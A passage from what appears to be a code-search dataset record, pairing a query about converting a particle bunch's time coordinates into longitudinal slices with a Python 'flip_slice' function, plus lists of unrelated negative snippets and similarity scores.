Read more about other methods here:\n # https://chessprogramming.wikispaces.com/Bitboard+Serialization\n\n if self.num == 0:\n return []\n\n bits = []\n\n for i in [0, 1, 2, 3, 4, 5, 6, 7]:\n row = (self.num >> UINT64_PADDING[i]) & EIGHT_ONES\n indices = row_to_indices[row]\n for index in indices:\n bits.append(index + i*8)\n\n return bits", "def get_new_images_range(self):\n if not self._buffers:\n return None\n acq_status=self.get_acquisition_status()\n if acq_status.last_read==acq_status.acquired:\n return None\n last_read=max(acq_status.last_read,acq_status.acquired-len(self._buffers))\n return last_read,acq_status.acquired-1", "def random_neighbors(self) -> int:\n return self.__random_neighbors", "def next_node_id(self) -> int:\n i = 1\n while True:\n if i not in self.session.nodes:\n break\n i += 1\n return i", "def __iter__(self):\n worker_info = torch.utils.data.get_worker_info()\n num_batches = len(self.coords_batcher)\n if worker_info is None:\n # In single-processing mode\n start, end = 0, num_batches\n else:\n worker_id = worker_info.id\n num_workers = worker_info.num_workers\n shard_size = int(np.ceil(num_batches / num_workers))\n start = shard_size * worker_id\n end = min(start + shard_size, num_batches)\n return (self.get_batch(i) for i in range(start, end))", "def NewStartingIndex(self) -> int:", "def get_test_index():\n return list(range(305, 435))", "def _get_child_indices(self, current_index: int) -> List[int]:\n multiplier = current_index * 2\n left_index = multiplier + 1\n right_index = multiplier + 2\n\n return [left_index, right_index]", "def _compute_indices(self):\n self.indices = np.arange(len(self.im_filenames))\n np.random.shuffle(self.indices)", "def next(self) -> int:\n self.idx += 1\n return self.m[self.idx]", "def next(self) -> int:\n self.idx += 1\n return self.m[self.idx]", "def get_vehicle_start_index(self):\n return [vehicle.start_index for vehicle in self.vehicles]", "def get_instance_idx(self, idx):\n obj_idx = 0\n while idx >= 0:\n idx -= self.num_per_instance_observations[obj_idx]\n obj_idx += 1\n return obj_idx - 1, int(idx + self.num_per_instance_observations[obj_idx - 1])", "def get_instance_idx(self, idx):\n obj_idx = 0\n while idx >= 0:\n idx -= self.num_per_instance_observations[obj_idx]\n obj_idx += 1\n return obj_idx - 1, int(idx + self.num_per_instance_observations[obj_idx - 1])", "def get_instance_idx(self, idx):\n obj_idx = 0\n while idx >= 0:\n idx -= self.num_per_instance_observations[obj_idx]\n obj_idx += 1\n return obj_idx - 1, int(idx + self.num_per_instance_observations[obj_idx - 1])", "def GetNext(self):\n if self.ids:\n return self.ids.pop()\n self.next_idx += 1\n return self.next_idx", "def get_index(self):\n\t\treturn call_sdk_function('PrlBootDev_GetIndex', self.handle)", "def main_rep_idxs(self):\n\n if '{}/{}'.format(SETTINGS, MAIN_REP_IDXS) in self.h5:\n return self.h5['{}/{}'.format(SETTINGS, MAIN_REP_IDXS)][:]\n else:\n return None", "def test_minibatches(self):\n batch_size = self.params['batch_size']\n start_index = 0\n while start_index + batch_size < 500:\n end_index = start_index + batch_size\n yield self.input[start_index:end_index], self.y[start_index:end_index]\n start_index = end_index", "def indices_of_split(self, split_name='train'):\n return self.indices_of('split', split_name)", "def available_images_index(self):\n first = ct.c_long()\n last = ct.c_long()\n self.lib.GetNumberAvailableImages(ct.pointer(first), ct.pointer(last))\n\n return (first.value, last.value)", "def get_rnn_cells(self):\n return 
[self.rnn]", "def mainIndices(self):\n return self.i1, self.i2", "def valid_minibatches(self):\n batch_size = self.params['batch_size']\n start_index = 0\n while start_index + batch_size < 500:\n end_index = start_index + batch_size\n yield self.input[start_index:end_index], self.y[start_index:end_index]\n start_index = end_index" ]
[ "0.76239616", "0.745489", "0.7413968", "0.70359194", "0.6630719", "0.65478575", "0.6362661", "0.6330628", "0.6231964", "0.6105139", "0.60316145", "0.5990063", "0.59887934", "0.5968671", "0.5885011", "0.58408743", "0.582455", "0.5802829", "0.57580876", "0.5756126", "0.5748933", "0.56911457", "0.56801367", "0.5666287", "0.5666216", "0.5591628", "0.5591628", "0.55514514", "0.55448", "0.55201316", "0.55193365", "0.5518828", "0.5511837", "0.54886395", "0.54758", "0.5452755", "0.54366", "0.5427121", "0.5425142", "0.5411513", "0.5411513", "0.53973407", "0.535786", "0.53570163", "0.53375524", "0.5336522", "0.5334523", "0.5325671", "0.5294226", "0.5283425", "0.5282946", "0.5268655", "0.52556384", "0.52538556", "0.52380854", "0.52273625", "0.52233255", "0.5223155", "0.5221936", "0.5221338", "0.52186036", "0.52064663", "0.5205493", "0.5204021", "0.52016264", "0.5195999", "0.51945823", "0.5184405", "0.51816624", "0.5171991", "0.51699924", "0.5165432", "0.516331", "0.516075", "0.516045", "0.5159515", "0.5159234", "0.51571006", "0.5151074", "0.5147259", "0.51445806", "0.51346755", "0.5131758", "0.51295483", "0.5119211", "0.5117242", "0.5117242", "0.51131475", "0.5111016", "0.5111016", "0.5111016", "0.51072437", "0.5102713", "0.5100025", "0.5099056", "0.50966513", "0.50936484", "0.50931436", "0.5092452", "0.5091979" ]
0.72795445
3
We use this function to flip the bunch in s and convert the information from time (t) to the longitudinal length along the bunch (s).
def flip_slice(t, bins=2944): s = constants.c*np.ravel((np.max(t)-t)) # Flip s s_sort_index = np.argsort(s) # Ascending order. plt.clf() hist_min = np.min(s) # hist_max = np.min(s)+(np.max(s)-np.min(s))*0.96 hist_max = np.min(s)+(np.max(s)-np.min(s))*0.99 hist, zplot, patches = plt.hist(s, bins,range = (hist_min, hist_max)) id_slices = [] for n in range(0, bins): num_begin = int(np.sum(hist[0:n])) num_end = int(np.sum(hist[0:n+1])) id_slices.append(s_sort_index[num_begin:num_end]) return id_slices, zplot, hist
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def MakeLongTime(t, N):\n dt=(t.max()-t.min())/(max(shape(t))-1)\n tout=arange(0,N,dtype='f')\n tout=tout*dt\n return tout", "def time_unwrap(val_timestamps):\n a=val_timestamps.shape[0]\n val_time =val_timestamps.astype('int64')\n for i in range(a-1):\n if val_time[i+1]-val_time[i]<-1*2**25:\n val_time[i+1:]+=2**26\n\n return(val_time)", "def get_times(ts_full, ts_system, len_state, sys_position, sys_length):\n ts = list(ts_full) + list(ts_system)\n subsystems = [[0, len_state]] * len(ts_full) + \\\n [[sys_position, sys_position + sys_length]] * len(ts_system)\n return ts, subsystems", "def tt(obs_time, *whatevers):\n n = whatevers[0].size\n return tuple(\n [obs_time[:n], ] +\n list(whatevers)\n )", "def _TIME2STEPS(time):\n return int(time*1000)", "def normalize_time(full_timestamps, half_timestamp):\n phases = (half_timestamp - full_timestamps[0]) / (full_timestamps[-1] - full_timestamps[0])\n return phases", "def flip_t_b(self, times: int):\n for i in range(0, times):\n self.tile_rows = self.tile_rows[::-1]", "def calc_tsunami(slip_result):\n gf = h5py.File('NA_CAS.hdf5', 'r')\n time_array = np.array(gf['time/timedata'])\n\n # dictionary for holding slip calculations\n scale_gf = []\n\n # declare empty array with max size\n ar_len = len(time_array)\n ar_width = get_array_size()\n\n tgf = np.zeros(shape=(ar_len, ar_width)) # tgf = tsunami green's function\n\n # loop over index adn slip value from slip array\n for i, slip in enumerate(slip_result):\n # print(i)\n # make sure slip is a float not string\n s = float(slip)\n\n # multiply slip by each subfault\n scale_gf.append(s * gf['GF/{:03}'.format(i)][:])\n\n # iterate over all the subfaults and add all subfaults together per site\n for sf in scale_gf:\n tgf += sf\n\n # return the slip_at_site array and the time array\n return (tgf, time_array)", "def tu_projection(s, t):\n N = int(log(len(s), 2))\n mask = sum(int(1 << j) for j in range(0, N-t))\n T = [\n [-1 for i in range(0, 2**t)]\n for j in range(0, 2**(N-t))\n ]\n U = [\n [-1 for j in range(0, 2**(N-t))]\n for i in range(0, 2**t)\n ]\n for j in range(0, 2**(N-t)):\n for i in range(0, 2**t):\n y = s[(j << t) | i]\n T[j][i] = y & mask\n U[i][j] = y >> t\n return T, U", "def convert_to_fixed_timesteps(trajectories, timestep_size=60):\n\n def time_to_timestep(row):\n h, m, s = map(int, row[\"Time\"].split(':'))\n timestep = round((h*3600+m*60+s)/timestep_size)\n return timestep\n\n for i, t in trajectories.items():\n t[\"Timestep\"] = t.apply(time_to_timestep, axis=1)\n t = t.drop_duplicates(\"Timestep\")\n t = t.set_index(\"Timestep\")\n trajectories[i] = t\n \n return trajectories", "def stabilize(td):\n\n def correct_saccade1(data):\n data.x -= np.rint(3.5 * data.ts / 105e3).astype(np.uint16)\n data.y -= np.rint(7 * data.ts / 105e3).astype(np.uint16)\n return data\n\n def correct_saccade2(data):\n data.x -= np.rint(3.5 + 3.5 * (data.ts - 105e3) / 105e3).astype(\n np.uint16)\n data.y -= np.rint(7 - 7 * (data.ts - 105e3) / 105e3).astype(np.uint16)\n return data\n\n def correct_saccade3(data):\n data.x -= np.rint(7 - 7 * (data.ts - 210e3) / 105e3).astype(np.uint16)\n return data\n\n copy = np.piecewise(td.data,\n [td.data.ts <= 105e3,\n (td.data.ts > 105e3) & (td.data.ts <= 210e3),\n (td.data.ts > 210e3)],\n [correct_saccade1, correct_saccade2,\n correct_saccade3]).view(np.recarray)\n\n # after saccades, we might end up with invalid x and y values, have to\n # correct these\n x_vals = copy.x\n y_vals = copy.y\n copy.x = np.piecewise(x_vals,\n [x_vals >= 65000,\n (x_vals < 65000) & 
(x_vals >= td.width),\n x_vals < td.width],\n [0, td.width - 1, lambda x: x])\n copy.y = np.piecewise(y_vals,\n [y_vals >= 65000,\n (y_vals < 65000) & (y_vals >= td.height),\n y_vals < td.height],\n [0, td.height - 1, lambda y: y])\n\n return copy", "def hypno2time(hypno, seconds_per_epoch=1):\n hypno = np.repeat(hypno, seconds_per_epoch)\n s = '*Duration_sec {}\\n'.format(len(hypno))\n stages = ['Wake', 'N1', 'N2', 'N3', 'REM', 'Art']\n d = dict(enumerate(stages))\n hypno_str = [d[h] for h in hypno]\n \n last_stage=hypno_str[0]\n \n for second, stage in enumerate(hypno_str):\n if stage!=last_stage:\n s += '{}\\t{}\\n'.format(last_stage, second)\n last_stage=stage\n s += '{}\\t{}\\n'.format(stage, second+1)\n return s", "def inverse_compress(self, pieces, start):\n \n time_series = [start]\n # stitch linear piece onto last\n for j in range(0, len(pieces)):\n x = np.arange(0,pieces[j,0]+1)/(pieces[j,0])*pieces[j,1]\n #print(x)\n y = time_series[-1] + x\n time_series = time_series + y[1:].tolist()\n\n return time_series", "def inverse_compress(self, pieces, start):\n \n time_series = [start]\n # stitch linear piece onto last\n for j in range(0, len(pieces)):\n x = np.arange(0,pieces[j,0]+1)/(pieces[j,0])*pieces[j,1]\n #print(x)\n y = time_series[-1] + x\n time_series = time_series + y[1:].tolist()\n\n return time_series", "def seg_times_to_trans_times(seg_times):\n trans_times = np.r_[0, np.cumsum(seg_times)]\n return trans_times", "def reverseString(s):\n for i in range(len(s)//2):\n t = s[i]\n s[i] = s[len(s)-i-1]\n s[len(s)-i-1] = t", "def duration_from_seconds(s):\n s = s\n m, s = divmod(s, 60)\n h, m = divmod(m, 60)\n d, h = divmod(h, 24)\n TIMELAPSED = f\"{d:03.0f}:{h:02.0f}:{m:02.0f}:{s:02.0f}\"\n return TIMELAPSED", "def timeStamp2LST(self, t):\n if isinstance(t, list):\n t = np.array(t)\n return self.lst_start + t*1e-6/(3590.)", "def _process_data(data):\n for array in data:\n # Check if time is inverted. 
If so, reverse array while keeping the time/data structure.\n if array and len(array) > 2 and array[0] > array[2]:\n buff_1 = array[::2][::-1]\n buff_2 = array[1::2][::-1]\n array[::2] = buff_1\n array[1::2] = buff_2\n return data", "def lpol_sdiff(s):\n return [1] + [0] * (s - 1) + [-1]", "def de_flip(n):\n start = '0'*(n//2) + '1' + '0'*(n//2)\n L = [[start]]\n L_tmp = []\n collect = []\n\n \n print(L)\n\n length = 1\n \n while(True):\n flag_cycle = -1\n count = 0\n for next_list in L:\n next_0 = next_list[-1][1:] + '0'\n next_1 = next_list[-1][1:] + '1'\n # 마지막 문자에서 0과 1을 추가한다.\n\n # 사이클완성!\n if next_0 == start:\n collect.append(next_list)\n flag_cycle = len(next_list)\n count += 1\n continue\n\n # 리스트에서 플립핑 검사\n if next_0 not in next_list and next_0[::-1] not in next_list:\n copy = next_list.copy()\n copy.append(next_0)\n L_tmp.append(copy)\n \n if next_1 not in next_list and next_1[::-1] not in next_list:\n copy = next_list.copy()\n copy.append(next_1)\n L_tmp.append(copy)\n \n if len(L_tmp) == 0:\n break\n L = L_tmp.copy()\n L_tmp = []\n\n print(\"length : {0}, flag_cycle : {1}, count : {2}\".format(length,flag_cycle,count))\n length += 1\n \n return collect", "def prepare_ts(s):\n s = s.rename_axis('ds')\n out = s.rename('y').reset_index()\n return out", "def flip_l_r(self, times: int):\n for i in range(0, times):\n new_rows = []\n for row in self.tile_rows:\n new_rows.append(row[::-1])\n\n self.tile_rows = new_rows", "def fashionably_late(arrivals, name=''):\n\n # arrival_wo_Last = arrivals[:len(arrivals)-1]\n half = (len(arrivals)//2)+1\n arrivals.pop()\n # return half\n return arrivals[half:]", "def litres(time):\n return int(time / 2)", "def dspmt(t):\n t = np.asarray(t)\n return spmt(t) - spmt(t - 1)", "def bintime(s,tunit,timebin,nanval): \r\n #same functionality can make use of pandas.cut\r\n #but have to convert column to seconds and bin accordingly i.e:\r\n #pd.cut(test.dt.seconds,[i*3600 for i in [1,2,3,4,5]],labels=[1,2,3,4])\r\n #and use pd.fillna(lastbin) for stuff outside bin\r\n #.cat.set_categories([0,1,2,3,4]).fillna(0)\r\n #test2['s_response_bin']=pd.cut(test2.s_to_first_response.dt.seconds,[i*3600 for i in [0,1,2,3,4]],labels=[1,2,3,4]).cat.set_categories([0,1,2,3,4]).fillna(0)\r\n #50% faster, but can't deal with values greater than last bin. 
Workaround- use an extremely large number ['0-1','1-2', '2-3','3-4','4-12','12-24','>24','UN'] \r\n '''\r\n tt.tic() \r\n test4=pd.cut(test2.s_to_last_closed.dt.total_seconds(),[i*3600 for i in [0,1,2,3,4,12,24,365*24]],labels=['0-1','1-2', '2-3','3-4','4-12','12-24','>24']).cat.add_categories(['UN']).fillna('UN')\r\n \r\n tt.toc()\r\n \r\n #del test2['s_response_bin']\r\n tt.tic()\r\n test3=test2.s_to_last_closed.apply(lambda s: af.bintime(s,'h',resolvebinlist,0))\r\n tt.toc()\r\n test5=pd.DataFrame([test3,test4]).transpose()\r\n '''\r\n for i in timebin[0:-1]:\r\n if s == 'None' or pd.isnull(s):#type(s)==pd.tslib.NaTType:\r\n binval=nanval\r\n break\r\n if s <= np.timedelta64(i, tunit):#timeunits=s / np.timedelta64(1, unit)\r\n binval=i\r\n break\r\n else: \r\n binval= timebin[-1]\r\n return binval", "def unixTimeConv(timestamps):\n\n\tnewTime = str(datetime.datetime.fromtimestamp(int(timestamps)))\n\tyearDate,timeT = newTime.split(' ')\n\tyear,month,day = str(yearDate).split('-')\n\thour,minutes,sec = timeT.split(':')\n\tsplitTimes = (year,month,day,hour,minutes,sec,timestamps)\n\n\treturn(splitTimes)", "def et(obs_time, *whatevers):\n obs_time = np.asarray(obs_time)\n n_time = obs_time.size\n n_obs = np.amax([w.size for w in whatevers])\n if n_obs > n_time:\n delta_t = obs_time[-1] - obs_time[-2]\n shortfall = n_obs-n_time\n obs_time = np.concatenate((\n obs_time,\n np.linspace(\n obs_time[-1] + delta_t,\n obs_time[-1] + delta_t * shortfall,\n shortfall,\n endpoint=True\n ),\n ))\n\n return tuple((obs_time,) + whatevers)", "def pmsdnut2(time):\n if time.size == 1:\n return iers.pmsdnut2(time.tt.mjd)\n else:\n # Only loop over unique epochs\n _, idx, r_idx = np.unique(np.asarray(time), return_index=True, return_inverse=True)\n return np.array([iers.pmsdnut2(t.tt.mjd) for t in time[idx]])[r_idx]", "def ns_tarray_to_sFlat(t_arr, DEPTH = 2, iftime = False):\n sflat = []\n tm, tm_max, dep = 0, 0, 0\n lis = t_arr.tolist()\n # print(\"tarr : \", t_arr)\n do = 1 if iftime else 0\n print(\"do : \", do)\n for i in range(t_arr.shape[0]):\n ctime, aflag = -1, False\n interv = 0\n sflat.append([])\n # sflat[i].append([0 for _ in range(DEPTH)])\n if iftime: \n abvp = [t_arr[0, 0, 3]]\n abvp.extend(list([0 for _ in range(DEPTH)]))\n else: abvp = [0 for _ in range(DEPTH)]\n sflat[i].append(abvp)\n tm, dep = -1, do # tm -1 initiator\n \n # print(\"sFlat -____________- : \", sflat[i][0])\n\n st_arr = sorted(lis[i], key=lambda x: x[0] if x[0] != 0 else sys.maxsize)\n\n t_arr = numpy.array([st_arr])\n\n for j in range(t_arr.shape[1]):\n if dep == DEPTH + do: \n dep = do\n if ctime == t_arr[i, j, 0] and dep == do: \n continue\n elif ctime != t_arr[i, j, 0]:\n\n if iftime: \n abvp= [t_arr[i, j, 3]]\n abvp.extend([0 for _ in range(DEPTH)])\n else: abvp= [0 for _ in range(DEPTH)]\n sflat[i].append(abvp)\n tm += 1\n dep = do\n if ctime + interv != t_arr[i, j, 0]:\n sflat[i][tm][1] = 0\n dep = do\n ctime += interv\n continue\n # print(\"DEP : \", dep, len(sflat[i][tm]), iftime)\n sflat[i][tm][dep] = int(t_arr[i, j, 1])\n ctime = t_arr[i, j, 0]\n interv = t_arr[i, j, 3]\n dep += 1\n \n tm_max = max([len(v) for v in sflat])\n\n #triming the array\n sflat_arr = numpy.zeros((t_arr.shape[0], tm_max + 1, DEPTH + do), dtype = 'int32') #because tm_max is zeo based indexing\n for i in range(sflat_arr.shape[0]):\n for j in range(len(sflat[i])):\n for k in range(sflat_arr.shape[2]):\n sflat_arr[i, j, k] = sflat[i][j][k]\n return sflat_arr", "def tilt(self) -> int:", "def eo(obs_time, *whatevers):\n obs_time = 
np.asarray(obs_time)\n n_time = obs_time.size\n new_whatevers = []\n for whatever in whatevers:\n whatever = np.asarray(whatever)\n n_obs = whatever.size\n if n_obs < n_time:\n whatever = np.concatenate((\n whatever,\n [whatever[-1]] * (n_time-n_obs)\n ))\n new_whatevers.append(whatever)\n return tuple([obs_time] + new_whatevers)", "def timing(t):\r\n if t < 1:\r\n power = int(np.log10(t))-1\r\n num = t/10**power\r\n if abs(power) < 10:\r\n return '{0:.1f}e-0{1:.0f}s'.format(num, abs(power))\r\n return '{0:.1f}e-{1:.0f}s'.format(num, abs(power))\r\n if t >= 1 and t < 60:\r\n return '{0:.1f}s'.format(t)\r\n if t >= 60 and t < 3600:\r\n minutes = int(t/60)\r\n seconds = t-(60*minutes)\r\n return '{0:.0f}m, {1:.1f}s'.format(minutes, seconds)\r\n if t >= 3600 and t < 86400:\r\n hours = int(t/3600)\r\n minutes = int((t-(3600*hours))/60)\r\n seconds = t-(3600*hours + 60*minutes)\r\n return '{0:.0f}h, {1:.0f}m, {2:.1f}s'.format(hours, minutes, seconds)\r\n if t >= 86400 and t < 31536000:\r\n days = int(t/86400)\r\n hours = int((t-(86400*days))/3600)\r\n minutes = int((t-(86400*days + 3600*hours))/60)\r\n seconds = t - (86400*days + 3600*hours + 60*minutes)\r\n return '{0:.0f}d, {1:.0f}h, {2:.0f}m, {3:.1f}s'.format(days, hours, minutes, seconds)\r\n if t >= 31536000:\r\n years = int(t/31536000)\r\n if years > 9999:\r\n years = t/31536000\r\n power = int(np.log10(years))\r\n num = years/10**power\r\n if abs(power) < 10:\r\n return '{0:.2f}e+0{1:.0f} years'.format(num, abs(power))\r\n return '{0:.2f}e+{1:.0f} years'.format(num, abs(power))\r\n days = int((t-(31536000*years))/86400)\r\n hours = int((t-(31536000*years + 86400*days))/3600)\r\n minutes = int((t-(31536000*years + 86400*days + 3600*hours))/60)\r\n seconds = t - (31536000*years + 86400*days + 3600*hours + 60*minutes)\r\n return '{0:.0f}y, {1:.0f}d, {2:.0f}h, {3:.0f}m, {4:.1f}s'.format(years, days, hours, minutes, seconds)", "def naked_twins(self,state:dict):\n for unit in self.unitlist:\n\n #find any twins in unit and save as counter object\n all_pairs = Counter([state[box] for box in unit if len(state[box])==2])\n twins = [key for key,val in all_pairs.items() if val == 2]\n\n #loop through twins and replace number in the other boxes\n for twin in twins:\n for num in twin:\n for box in unit:\n if twin != state[box]:\n self.assign_value(state,box,state[box].replace(num,''))\n \n return state", "def OPCtimetransform(data, to):\n \n remove_times = []\n outtimes = []\n times = {'ms':[],'SS':[],'MM':[],'HH':[]}\n\n for i in range(0, len(data)):\n times['HH'] = 0\n times['MM'] = 0\n times['SS'] = 0\n times['ms'] = 0\n\n item = data[i]\n \n try:\n if len(item.split('.')[1]) < 2:\n item += '0'\n except IndexError:\n item += '.00'\n if len(item) < 9:\n item = item.zfill(9)\n if int(item[:2]) > 23:\n item = '0' + item\n \n # remove items with extra zero (2319010.00 to 231910)\n if len(item) > 9:\n olditem = item\n newitem = item[:4] + item[5:]\n print( ('Repairing strange value %s into %s')%(olditem, newitem) )\n item = newitem\n else:\n pass\n try:\n md = dt.datetime.strptime(item, \"%H%M%S.%f\")\n \n # round off items which exceed 59 minutes or 59 seconds \n # (i.e. 
146001 to 150001.)\n except ValueError:\n \n try:\n times['HH'] = int(item[0:2])\n times['MM'] = int(item[2:4])\n times['SS'] = int(item[4:6])\n times['ms'] = int(item[7:9])\n except ValueError:\n print(i, item)\n\n if times['SS'] > 59:\n times['MM'] += 1\n times['SS'] = 0\n if times['MM'] > 59:\n times['HH'] += 1\n times['MM'] = 0\n # discard items which exceed 23 hours\n if times['HH'] > 23:\n times['HH'] = 23\n print( ('resetting value %s')%(item) )\n \n\n md = dt.datetime(1900,1,1,times['HH'], times['MM'], times['SS']) \n\n \n outtimes.append( dt.datetime.strftime(md, to) )\n\n return outtimes", "def get_chop_times_indices(times, chop_length=180., chop_nsamp=None, strict=False, exit_on_error=False):\n\n n_times = len(times)\n\n try:\n data_type = times.dtype()\n except:\n data_type = np.float64\n\n if chop_nsamp: # compute chop based on number of samples\n n_chops = int(n_times // chop_nsamp)\n if n_chops == 0:\n n_chops = 1\n n_times_chop = chop_nsamp\n else: # compute chop based on duration given\n dt = times[1] - times[0] # time period between two time samples\n n_chops, t_rest = np.divmod(times[-1], chop_length)\n n_chops = int(n_chops)\n\n # chop duration in s\n if strict:\n # ToDo check for times[-1] < chop_length\n chop_len = chop_length\n else:\n chop_len = chop_length + t_rest // n_chops # add rest to chop_length\n\n msg1 = [\n \" -> number of chops : {}\".format(n_chops),\n \" -> calculated chop legth: {}\".format(chop_len),\n \" -> rest [s] : {}\".format(t_rest),\n \"-\" * 40,\n \" -> chop length : {}\".format(chop_length),\n \" -> numer of timepoints : {}\".format(n_times),\n \" -> strict : {}\".format(strict),\n \"-\" * 40,\n \" -> exit on error : {}\\n\".format(exit_on_error)\n ]\n\n try:\n n_times_chop = int(chop_len / dt)\n except:\n if exit_on_error:\n msg = [\"EXIT on ERROR\"]\n msg.extend(msg1)\n logger.exception(\"\\n\".join(msg))\n assert (chop_len > 0), \"Exit => chop_len: {}\\n\".format(chop_len)\n else: # data size < chop_length\n msg = [\"setting <chop_len> to number of time points!!!\"]\n msg.extend(msg1)\n logger.error(\"\\n\".join(msg))\n\n n_times_chop = n_times\n n_chops = 1\n msg = [\"data length smaller then chop length !!!\",\n \" --> Adjusting:\",\n \" -> number of chops: {}\".format(n_chops),\n \" -> chop time : {}\".format(n_times_chop)\n ]\n logger.warning(\"\\n\".join(msg))\n\n # check if chop length is larger than max time (e.g. 
if strict=True)\n if n_times_chop > n_times:\n n_times_chop = n_times\n\n # compute indices for each chop\n ix_start = np.arange(n_chops) * n_times_chop # first indices of each chop\n ix_end = np.append((ix_start - 1)[1:], n_times - 1) # add last entry with last index\n\n # chop indices\n chop_indices = np.zeros([n_chops, 2], dtype=np.int)\n chop_indices[:, 0] = ix_start\n chop_indices[:, 1] = ix_end\n\n # times in s\n chop_times = np.zeros([n_chops, 2], dtype=data_type)\n chop_times[:, 0] = times[ix_start]\n chop_times[:, 1] = times[ix_end]\n\n return chop_times, chop_indices", "def calc(s,tnx,i0s,ies):\n\n # round down\n tile0 = s.start // tnx\n # round up\n tilee = -(-s.stop // tnx)\n\n tiles = []\n srcslices = []\n tgtslices = []\n for tile in range(tile0,tilee):\n ii0 = max(0, -((s.start - i0s[tile]) // s.step))\n iie = -((s.start - min(s.stop,ies[tile])) // s.step)\n if iie > ii0:\n tiles.append(tile)\n myi0 = s.start + ii0*s.step - i0s[tile]\n myie = s.start + iie*s.step - i0s[tile]\n srcslices.append(slice(myi0,myie,s.step))\n tgtslices.append(slice(ii0,iie))\n\n return tiles, srcslices, tgtslices", "def de_flip2(n = 3,start = None):\n if start == None:\n start = '0'*(n//2) + '1' + '0'*(n//2)\n else:\n n = len(start)\n L = [[start]]\n L_tmp = []\n collect = []\n\n \n print(L)\n\n length = 1\n \n while(True):\n flag_cycle = -1\n count = 0\n for next_list in L:\n next_0 = next_list[-1][1:] + '0'\n next_1 = next_list[-1][1:] + '1'\n # 마지막 문자에서 0과 1을 추가한다.\n\n # 사이클완성!\n if next_0 == start:\n collect.append(next_list)\n flag_cycle = len(next_list)\n count += 1\n continue\n\n # 리스트에서 플립핑 검사\n if next_0 not in next_list and next_0[::-1] not in next_list:\n copy = next_list.copy()\n copy.append(next_0)\n L_tmp.append(copy)\n \n if next_1 not in next_list and next_1[::-1] not in next_list:\n copy = next_list.copy()\n copy.append(next_1)\n L_tmp.append(copy)\n \n if len(L_tmp) == 0:\n break\n L = L_tmp.copy()\n L_tmp = []\n\n print(\"length : {0}, flag_cycle : {1}, count : {2}\".format(length,flag_cycle,count))\n length += 1\n \n return collect", "def discrete_trajectory_to_wait_times(data, t_col='t', state_col='state'):\n\n states = data[state_col].values\n times = data[t_col].values\n num_measurements = len(data)\n\n # now iterate through valid part of trajectory to establish wait times\n start_times = []\n end_times = []\n earliest_st = [] # bounds on start time\n latest_st = []\n earliest_et = [] # bounds on end time\n latest_et = []\n wait_state = []\n wait_type = []\n k0 = 0 # index at which current state began\n state = states[k0]\n state_has_changed = False\n for k in range(num_measurements):\n # if no state change, continue\n if states[k] == state:\n continue\n # otherwise, store change\n start_times.append(times[k0])\n end_times.append(times[k])\n wait_state.append(state)\n # bounds on true wait time value\n if k0 == 0: # left exterior times have exactly determined \"start\"\n earliest_st.append(times[k0])\n else:\n earliest_st.append(times[k0-1])\n latest_st.append(times[k0])\n earliest_et.append(times[k-1])\n latest_et.append(times[k])\n # if this is the first state change, we store it separately\n if not state_has_changed:\n wait_type.append('left exterior')\n state_has_changed = True\n # otherwise, a normal state change\n else:\n wait_type.append('interior')\n # either way, state has changed\n state = states[k]\n k0 = k\n # also store the time spent in final state\n start_times.append(times[k0])\n end_times.append(times[k])\n if k0 == 0: # full exterior times also have exactly 
determined \"start\"\n earliest_st.append(times[k0])\n else:\n earliest_st.append(times[k0-1])\n latest_st.append(times[k0])\n # right/full exterior times have exactly determined \"end\"\n earliest_et.append(times[k])\n latest_et.append(times[k])\n # state type stored specially for final state\n wait_state.append(state)\n if not state_has_changed:\n wait_type.append('full exterior')\n else:\n wait_type.append('right exterior')\n start_times = np.array(start_times)\n end_times = np.array(end_times)\n wait_times = end_times - start_times\n min_waits = np.array(earliest_et) - np.array(latest_st)\n max_waits = np.array(latest_et) - np.array(earliest_st)\n df = pd.DataFrame({'start_time': start_times, 'end_time': end_times,\n 'wait_time': wait_times, 'state': wait_state,\n 'min_waits': min_waits, 'max_waits': max_waits,\n 'wait_type': wait_type})\n df.index.name = 'rank_order'\n df['window_size'] = times[-1] - times[0]\n return df", "def normalize_timestamp(timestamp_series):\n # convert datetime strings into milliseconds from epoch\n times = pd.to_datetime(timestamp_series, format='%Y-%m-%d %H:%M:%S').astype(np.int64) // int(1e6)\n return times", "def transform_timestamps(time_tracker):\n def calculate_timediff(t1, t2):\n return (t2 - t1).seconds + (t2 - t1).microseconds/1000000\n\n durations = dict()\n\n durations[\"Initialization\"] \\\n = round(calculate_timediff(time_tracker[\"time_start\"],\n time_tracker[\"after_init\"]), 3)\n\n durations[\"Configuration\"] \\\n = round(calculate_timediff(time_tracker[\"after_init\"],\n time_tracker[\"after_config\"]), 3)\n\n iter_list = []\n for i, iteration in enumerate(time_tracker[\"iterations\"]):\n if i == 0:\n iter_list\\\n .append(round(calculate_timediff(time_tracker[\"after_config\"],\n iteration), 3))\n else:\n iter_list\\\n .append(round(calculate_timediff(\n time_tracker[\"iterations\"][i-1], iteration), 3))\n durations[\"Iterations\"] = iter_list\n\n durations[\"Finalization\"] \\\n = round(calculate_timediff(time_tracker[\"iterations\"][-1],\n time_tracker[\"finish\"]), 3)\n durations[\"Total\"] \\\n = round(durations[\"Initialization\"] + durations[\"Configuration\"]\n + sum(durations[\"Iterations\"]) + durations[\"Finalization\"], 3)\n\n return durations", "def reverse_list(s):\r\n for i in range(len(s) // 2):\r\n s[i], s[-1-i] = s[-1-i], s[i]", "def create_timestructured(self, good, quantity):\n length = len(self._haves[good].time_structure)\n for i in range(length):\n qty = quantity[i] if type(quantity) == list else quantity / length\n self._haves[good].time_structure[i] += qty", "def timeave_old( mv ):\n # I haven't thought yet about how missing values would work with this...\n # If time intervals be unequal, this will have to be changed...\n sh = mv.shape # e.g. [312,90,144] for t,lat,lon\n n = sh[0]\n # BTW, this is the size of everything else:\n # n2 = reduce( operator.mul, sh[1:] ) # e.g. 
